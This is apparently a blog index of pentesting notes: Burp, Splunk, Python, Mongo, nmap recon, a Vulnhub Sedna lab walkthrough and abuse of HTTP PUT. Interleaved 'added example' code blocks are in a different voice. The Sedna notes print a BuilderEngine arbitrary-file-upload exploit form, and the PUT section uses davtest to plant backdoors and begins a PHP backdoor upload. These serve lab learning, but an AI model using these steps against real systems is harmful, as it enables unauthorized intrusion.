Burp Notes

Automatically change value of request parameter

Go to Proxy -> Options and click Add under Match and Replace. Specify the value to match and the value to replace it with, such as:

    Match: uid=bob
    Replace with: uid=evilbob

This can be done with a regex if you'd like. For example, to rewrite the Host header, match the whole header line; note that the replacement stands in for everything the expression matched, so it has to include the header name again or the line turns into a bare hostname:

    Match: ^Host: foo\.example\.org$
    Replace with: Host: bar.example.org

Feel free to add a Comment: to lend it some context.

Intruder

Extracting useful info from responses

Run your attack and find the stuff you want to grep out. Click Options, go to Grep - Extract, and click Add. Search for the item you want to grep out and click the > to highlight it. Make sure the Start after expression and End at delimiter match a pattern that will consistently get you the data you want, then click OK. Clear out the other columns you'll see by clicking the Clear button under Grep - Match. Click the Results tab and observe the item you wanted to grep as a column.

Export output to Excel

Click Save -> Results table, specify the columns that you want in the document, and click Save.

Resource: https://security.stackexchange.com/questions/155434/how-do-i-extract-data-from-response-in-burp-suite-intruder ...

August 16, 2018 · Jayson Grace

Burp Extension Development

Thanks to Al for helping me to compile this.

General

For debugging (and modularity in general), be sure to separate your logic from the file that holds the BurpExtender class, which is the class Burp needs in order to load the extension. That file should be stripped down to the bare essentials.

Jython

Install Jython, obviously. You'll find the classes you can import under Burp's Extender tab. To import a class, use:

    from burp import <name_here>

...
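To show the split described above, here is an added example (not code from the post, nor Al's): the rewriting logic is a plain function with no Burp imports, so it runs and can be unit-tested under ordinary CPython, while the BurpExtender class is reduced to the glue that feeds Burp's request headers through it. The rules it applies are the same ones the Burp Notes entry above configures by hand under Match and Replace (the uid and Host rewrites); those rule values and the extension name are constructed for illustration. The Burp calls used (`registerExtenderCallbacks`, `getHelpers`, `analyzeRequest`, `getHeaders`, `getBodyOffset`, `buildHttpMessage`, `setRequest`) are standard Extender API.

```python
import re

# Pure logic: no Burp imports here, so this part runs (and can be tested)
# outside Burp. In a real extension it would live in its own module that the
# stripped-down BurpExtender file imports.

# Constructed sample rules in the shape of Proxy -> Options -> Match and Replace:
# (regex applied to one header line, replacement for the matched text).
DEFAULT_RULES = [
    (r"^Host: foo\.example\.org$", "Host: bar.example.org"),
    (r"uid=bob\b", "uid=evilbob"),
]


def rewrite_headers(headers, rules=DEFAULT_RULES):
    """Apply every (pattern, replacement) rule to every header line.

    headers: list of strings as Burp's IRequestInfo.getHeaders() returns them;
             element 0 is the request line (e.g. "GET /?uid=bob HTTP/1.1"),
             the rest are "Name: value". Returns a new list; input is untouched.
    """
    rewritten = []
    for line in headers:
        for pattern, replacement in rules:
            line = re.sub(pattern, replacement, line)
        rewritten.append(line)
    return rewritten


# Thin Burp-facing shim: the only class the file Burp loads has to define.
# The import is guarded so the module also loads under plain CPython.
try:
    from burp import IBurpExtender, IHttpListener
except ImportError:  # not running under Jython inside Burp
    class IBurpExtender(object):
        pass

    class IHttpListener(object):
        pass


class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("header-rewrite-example")  # constructed name
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        if not messageIsRequest:
            return
        info = self._helpers.analyzeRequest(messageInfo)
        headers = [str(h) for h in info.getHeaders()]
        body = messageInfo.getRequest()[info.getBodyOffset():]
        new_headers = rewrite_headers(headers)
        if new_headers != headers:
            messageInfo.setRequest(self._helpers.buildHttpMessage(new_headers, body))
```

Because `rewrite_headers` takes and returns plain lists of strings, a bug in a rule can be reproduced with a two-line script instead of reloading the extension in Burp and replaying traffic.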

July 19, 2018 · Jayson Grace

Splunk Notes

URI Path for web application

If you want to look at the information associated with a specific URI path for a web application:

    sitetolookat.com sourcetype=<the sourcetype you have for web stuff> url="/uri/path/file.php*"

Add image to dashboard

    <dashboard>
      <row>
        <html>
          <h1>HTML Panel Example</h1>
          <p>The HTML panel displays inline HTML.</p>
          <img src="picture.jpg"/>
        </html>
      </row>
    </dashboard>

Resource: https://answers.splunk.com/answers/136162/add-picture-to-dashboard.html

View internal Splunk logs

    index=_internal source="*.log"

Resource: https://answers.splunk.com/answers/575570/where-can-i-find-the-internal-logs-in-the-splunk-5.html

tail -f functionality

After running a query, change the time range preset from a fixed range to a real-time window, such as a 5 minute window, to keep showing every event that matches the search criteria from the past 5 minutes. ...

July 19, 2018 · Jayson Grace

HashiCorp Vault Research

Nice introduction: https://mycodesmells.com/post/introduction-to-vault

Fun write-up: https://www.davidbegin.com/cubbyhole-backend-and-response-wrapping/

Token info: https://www.vaultproject.io/docs/concepts/tokens.html

Cool dev implementation series with OSX and LastPass:

    https://blog.alanthatcher.io/fun-and-profit-with-vault-2/
    https://blog.alanthatcher.io/fun-and-profit-with-vault-part-2/
    https://blog.alanthatcher.io/fun-and-profit-with-vault-part-3/

Single-use implementation: https://www.slalom.com/thinking/managing-secrets-using-hashicorp-vault

How-to on Ubuntu: https://www.digitalocean.com/community/tutorials/how-to-securely-manage-secrets-with-hashicorp-vault-on-ubuntu-16-04

July 2, 2018 · Jayson Grace

Python Notes

Install pip

If you end up on a system without pip, you can install it from a script:

    wget https://bootstrap.pypa.io/get-pip.py   # Download installation script
    python3 get-pip.py                           # Run installation script

Read file line-by-line and print each line

    def print_lines(file):
        with open(file) as f:
            for line in f:
                print(line, end='')  # each line already ends with its newline

Read file into list

    def return_list(file):
        with open(file) as f:
            lines = f.readlines()  # don't name this 'list': it shadows the builtin
        return lines

Remove line from a file containing a specified string

    def remove_line_containing_string(file, string):
        with open(file, 'r') as f:
            contents = f.readlines()
        with open(file, 'w') as f:
            for line in contents:
                if string not in line:
                    f.write(line)

Check if file exists

    import os

    def file_exists(file):
        return os.path.isfile(file)

Find and replace line in a file

    def find_and_replace_in_file(inp_file, old, new):
        with open(inp_file) as f:  # text mode already handles universal newlines; 'U' is gone in 3.11
            new_output = f.read()
        # str.replace substitutes every occurrence in one pass; a 'while old in new_output'
        # loop is unnecessary and never terminates when new contains old.
        new_output = new_output.replace(old, new)
        with open(inp_file, 'w') as f:
            f.write(new_output)

Resource: https://bhagat.blog/2017/01/06/replacing-string-in-a-file-using-python/ ...
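The remove-line and find-and-replace snippets above both reopen the file with `'w'`, which truncates it before the new content is written; a crash or Ctrl-C at that moment leaves an empty file, which matters when the file is a config or a hosts list you are editing on a box you do not own. This added example (not from the post) does the same two edits through a write-to-temp-then-rename helper, so the file is always either the old version or the new one, and it shows the `old`-inside-`new` case that a `while old in text` loop would never finish. The config contents in `demo()` are constructed sample input.

```python
import os
import shutil
import tempfile


def rewrite_file_atomically(path, transform, encoding="utf-8"):
    """Read `path`, run its text through `transform`, and write the result back safely.

    The new content goes to a temp file in the same directory, is fsync'ed, gets the
    original's permission bits, and is then renamed over the original. rename is
    atomic on the same filesystem, so readers never see a half-written file.
    Returns True if the file changed, False if nothing needed doing.
    """
    with open(path, "r", encoding=encoding, newline="") as f:
        original = f.read()
    updated = transform(original)
    if updated == original:
        return False
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(prefix=".tmp-", dir=directory)
    try:
        with os.fdopen(fd, "w", encoding=encoding, newline="") as f:
            f.write(updated)
            f.flush()
            os.fsync(f.fileno())
        shutil.copymode(path, tmp_path)  # mkstemp creates 0600; keep the original mode
        os.replace(tmp_path, path)
    except BaseException:
        os.unlink(tmp_path)
        raise
    return True


def replace_in_file(path, old, new):
    """Replace every occurrence of `old` with `new`.

    str.replace already substitutes all occurrences in a single pass, so no loop is
    needed; 'while old in text' never terminates when new contains old
    (e.g. old='pass', new='password').
    """
    return rewrite_file_atomically(path, lambda text: text.replace(old, new))


def drop_lines_containing(path, needle):
    """Remove every line that contains `needle`, preserving the file's line endings."""
    return rewrite_file_atomically(
        path,
        lambda text: "".join(
            line for line in text.splitlines(keepends=True) if needle not in line),
    )


def demo():
    """Exercise both helpers on a constructed config file in a temp directory.
    Returns (replace_changed, drop_changed, final_contents)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "app.conf")  # constructed sample file
        with open(path, "w", encoding="utf-8", newline="") as f:
            f.write("user=bob\npass=hunter2\n# pass is a secret\ndebug=true\n")
        changed_a = replace_in_file(path, "pass", "password")  # new contains old
        changed_b = drop_lines_containing(path, "debug")
        with open(path, encoding="utf-8", newline="") as f:
            return changed_a, changed_b, f.read()


if __name__ == "__main__":
    print(demo())
```

`newline=""` on both the read and the write keeps CRLF files CRLF; without it Python would silently normalise line endings on the way through.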

January 3, 2018 · Jayson Grace

Old: Modernizing Techvomit

This site used to run on Ghost. I decided to keep this article despite now using Hugo for posterity. Begin old article: I made this decision a couple of years ago on a 4 hour plane ride when I was bored, and wanted to kill two birds with one stone: start learning how some of the AWS services worked, and get a website going. At the time I didn’t really make the site very easy to maintain, and had to learn a couple of lessons over the years as a result. ...

October 2, 2017 · Jayson Grace

Vulnhub - Sedna

These are my notes from running through the Sedna vulnerable VM.

Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities.

Observe /license.txt - it will inform us that the target web application is running BuilderEngine.

Search for an exploit we can use:

    searchsploit builderengine

View the source for the exploit:

    searchsploit -x 40390

Copy the exploit code into exploit.html:

    <html>
    <body>
    <form method="post"
          action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
          enctype="multipart/form-data">
      <input type="file" name="files[]" />
      <input type="submit" value="send" />
    </form>
    </body>
    </html>

Host it: ...

March 27, 2017 · Jayson Grace

Mongo Cheatsheet

robomongo is an awesome GUI clicky tool.

Connect to the DB:

    mongo <target>

Get host information:

    db.adminCommand({ hostInfo: 1 });

Show users:

    db.runCommand({ usersInfo: 1 });

Show roles:

    show roles

Show databases:

    show dbs

Use a database:

    use <db name>

Show tables (collections):

    db.getCollectionNames()
    // or
    show tables
    // or
    show collections

Get data in a table:

    db.<table name>.find()

Get version of mongo:

    db.version();

Get JSON dump of the data

Create export.js with the following:

    profileData = db.<collection name>.find(); // for example: db.system.users
    while (profileData.hasNext()) {
        printjson(profileData.next());
    }

Run it like so: ...

February 17, 2017 · Jayson Grace

Abusing HTTP PUT

Detection of vulnerability

Run Nikto:

    nikto --host <target ip>:<target port>

If it returns this:

    + OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.

you are potentially in business.

Use davtest to get a backdoor

This tool runs all of the payloads that it has, sends backdoors if exploitation is successful, and cleans up after itself:

    davtest -url "http://${TARGET_IP}:${TARGET_PORT}" -sendbd auto -cleanup

PHP Backdoor with Burp

Capture a request and send it to Repeater. Change the method to PUT and add some PHP code to the bottom of the request. It should look roughly like this: ...
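Nikto's OSVDB-397 finding comes from the Allow header, and a server can advertise PUT there yet reject it, or accept it only under one writable directory, so "potentially in business" is the right wording. This added example (not the post's code) confirms the behaviour before anything executable is uploaded: it compares what OPTIONS advertises with what a PUT actually does, uploads a uniquely named plain-text marker, fetches it back byte-for-byte, and DELETEs it. `PutEnabledHandler` is a constructed stand-in for a misconfigured server so the probe can be run offline; against a real target you call `probe_put(host, port)` and do not need it.

```python
import http.client
import os
import tempfile
import threading
import uuid
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def _request(host, port, method, path, body=None):
    """One request on a fresh connection; returns (status, header list, body)."""
    headers = {}
    if body is not None:
        headers["Content-Type"] = "text/plain"
        headers["Content-Length"] = str(len(body))
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request(method, path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.getheaders(), resp.read()
    finally:
        conn.close()


def probe_put(host, port, directory="/"):
    """Confirm (not just infer from OPTIONS) whether PUT stores files under `directory`.
    Uploads a harmless text marker, reads it back, then DELETEs it."""
    marker = "/probe-%s.txt" % uuid.uuid4().hex     # unique name: never clobbers real content
    target = directory.rstrip("/") + marker
    payload = ("put-probe %s\n" % marker).encode()

    _, headers, _ = _request(host, port, "OPTIONS", directory)
    allow = dict((k.lower(), v) for k, v in headers).get("allow", "")
    put_status, _, _ = _request(host, port, "PUT", target, body=payload)
    stored = put_status in (200, 201, 204)
    readback, delete_status = False, None
    if stored:
        get_status, _, got = _request(host, port, "GET", target)
        readback = get_status == 200 and got == payload
        delete_status, _, _ = _request(host, port, "DELETE", target)
    return {
        "allow": allow,                  # what the server advertises
        "put_status": put_status,        # what it actually did
        "readback": readback,            # the file is really served back
        "delete_status": delete_status,  # None if we never stored anything
        "vulnerable": stored and readback,
    }


class PutEnabledHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for a misconfigured server (PUT/DELETE write to `root`).
    Exists only so the probe can be exercised offline; not any real server's code."""
    root = None

    def _local_path(self):  # basename only, so the toy cannot be walked out of root
        return os.path.join(self.root, os.path.basename(self.path))

    def _reply(self, status, data=b"", extra=None):
        self.send_response(status)
        for k, v in (extra or {}).items():
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        if data:
            self.wfile.write(data)

    def do_OPTIONS(self):
        self._reply(200, extra={"Allow": "GET, PUT, DELETE, OPTIONS"})

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        with open(self._local_path(), "wb") as f:
            f.write(self.rfile.read(length))
        self._reply(201)

    def do_GET(self):
        path = self._local_path()
        if not os.path.isfile(path):
            return self._reply(404)
        with open(path, "rb") as f:
            self._reply(200, f.read())

    def do_DELETE(self):
        path = self._local_path()
        if os.path.isfile(path):
            os.unlink(path)
        self._reply(204)

    def log_message(self, *args):
        pass  # keep the demo quiet


def demo():
    """Start the constructed server on a random loopback port and probe it."""
    with tempfile.TemporaryDirectory() as root:
        PutEnabledHandler.root = root
        server = ThreadingHTTPServer(("127.0.0.1", 0), PutEnabledHandler)
        threading.Thread(target=server.serve_forever, daemon=True).start()
        try:
            return probe_put("127.0.0.1", server.server_address[1])
        finally:
            server.shutdown()
            server.server_close()


if __name__ == "__main__":
    print(demo())
```

If `put_status` is 201 but `readback` is False, the server stored the file somewhere it does not serve from (or rewrote it), which is exactly the case where a dropped PHP backdoor would never execute; check the directory mapping before moving on to davtest or a Repeater PUT.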

February 17, 2017 · Jayson Grace

Pentesting notes and snippets

Recon

Copy pasta stuff I use for recon - both inside and outside of a target.

Host Discovery

Ping sweeping:

    IP_RANGE='192.168.0.0'
    SUBNET_MASK='24'   # prefix length only; the slash is added below
    nmap -sn -oA onlineHosts "${IP_RANGE}/${SUBNET_MASK}"

-sn: Use ping scan for host discovery (don't run a port scan)
-oA: Store output in normal, XML, and grepable file formats

Parse IP addresses from gnmap file:

    grep "^Host: " onlineHosts.gnmap | grep "Status: Up" | \
        cut -d " " -f 2 | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n | uniq

(sort -n alone orders dotted quads by their first octet only; sorting per octet keeps 192.168.0.2 ahead of 192.168.0.10.)

Skip ICMP checks ...
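The same filter as the grep pipeline above, as an added Python example (not from the post) for when the host list has to feed a script rather than the next shell command: it keeps only hosts nmap marked Up, de-duplicates them, and sorts with the `ipaddress` module so numeric order and IPv6 both work. `SAMPLE_GNMAP` is a constructed sample of the grepable format, not real scan output.

```python
import ipaddress

# Constructed sample of nmap's grepable output (the .gnmap file from -oA); not a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2018 as: nmap -sn -oA onlineHosts 192.168.0.0/24
Host: 192.168.0.10 (printer.lan)\tStatus: Up
Host: 192.168.0.2 ()\tStatus: Up
Host: 192.168.0.100 ()\tStatus: Down
Host: 192.168.0.1 (gw.lan)\tStatus: Up
Host: 192.168.0.10 (printer.lan)\tStatus: Up
Host: fe80::1 ()\tStatus: Up
# Nmap done at Mon Jan  1 00:00:02 2018 -- 256 IP addresses (5 hosts up) scanned in 2.03 seconds
"""


def parse_gnmap_up_hosts(text):
    """Return the unique addresses of hosts reported 'Status: Up', sorted numerically.

    Each gnmap host line looks like:
        Host: <ip> (<hostname or empty>)\tStatus: Up
    A host can appear twice (resumed scan, overlapping ranges), so the result is
    de-duplicated. Sorting by ipaddress objects rather than strings keeps
    192.168.0.2 ahead of 192.168.0.10 and handles IPv6 entries too.
    """
    found = set()
    for line in text.splitlines():
        if not line.startswith("Host: ") or "Status: Up" not in line:
            continue
        found.add(ipaddress.ip_address(line.split()[1]))
    # v4 and v6 objects do not compare with each other, so key on (version, integer value)
    return [str(a) for a in sorted(found, key=lambda a: (a.version, int(a)))]


def parse_gnmap_file(path):
    """Convenience wrapper: read a .gnmap file from disk and parse it."""
    with open(path, encoding="utf-8") as f:
        return parse_gnmap_up_hosts(f.read())


if __name__ == "__main__":
    print("\n".join(parse_gnmap_up_hosts(SAMPLE_GNMAP)))
```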

February 14, 2017 · Jayson Grace